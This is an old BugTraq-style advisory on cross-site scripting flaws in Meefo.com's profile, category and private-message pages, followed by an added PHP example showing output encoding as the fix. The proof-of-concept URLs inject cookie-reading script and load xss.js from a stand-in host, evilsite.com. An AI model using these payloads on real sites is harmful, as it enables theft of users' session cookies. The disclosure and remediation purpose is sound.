BugTraq
Meefo.com - XSS with cookie include
Jun 10 2006 09:38PM
luny youfucktard com
Meefo.com
Homepage:
http://meefo.com
Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs
------------------------------
Reading a profile, with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user can input malicious data, such as
<script>alert(document.cookie)</script>, and it will pop up with the user's cookie. Included at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4.jpg and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>
When editing your profile, data isn't properly filtered in the input boxes either, so
<script>alert(document.cookie)</script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Reading categories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PMs XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
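
Added example, not part of the original post and not Meefo's code: it shows why adding backslashes to ' and " leaves the reflected `user_pp` value executable as markup, next to HTML-context output encoding that neutralizes it. It assumes the site's filter behaves like PHP's `addslashes()`; the function names, the username policy, and the sample inputs are hypothetical.

```php
<?php
// Constructed sample values for the user_pp parameter; the second one is the
// payload quoted in the advisory.
$samples = [
    'username',
    'username<script>alert(document.cookie)</script>',
    "O'Brien \"quoted\"",
];

// Weak (assumed model of the site's filter): addslashes() prefixes ' " \ and
// NUL with a backslash. It is an SQL-era quoting helper, so < and > pass
// through and the browser still parses the value as a script element.
function render_weak(string $userPp): string
{
    return '<h1>Profile: ' . addslashes($userPp) . '</h1>';
}

// Hardened: encode for the HTML context at output time. ENT_QUOTES also
// encodes ', so the same helper is safe inside quoted attribute values,
// e.g. when the profile edit form re-populates its input boxes.
function render_hardened(string $userPp): string
{
    $encoded = htmlspecialchars($userPp, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>Profile: ' . $encoded . '</h1>';
}

// Defence in depth: reject values that cannot be a username at all
// (hypothetical policy: 1-32 letters, digits, underscore, dot or hyphen).
function is_valid_username(string $userPp): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $userPp) === 1;
}

foreach ($samples as $s) {
    printf("input    : %s\n", $s);
    printf("weak     : %s\n", render_weak($s));
    printf("hardened : %s\n", render_hardened($s));
    printf("valid?   : %s\n\n", is_valid_username($s) ? 'yes' : 'no');
}
```

The same encoding applies to the `cat` and `to` parameters listed above. Marking the session cookie HttpOnly additionally keeps it out of `document.cookie`.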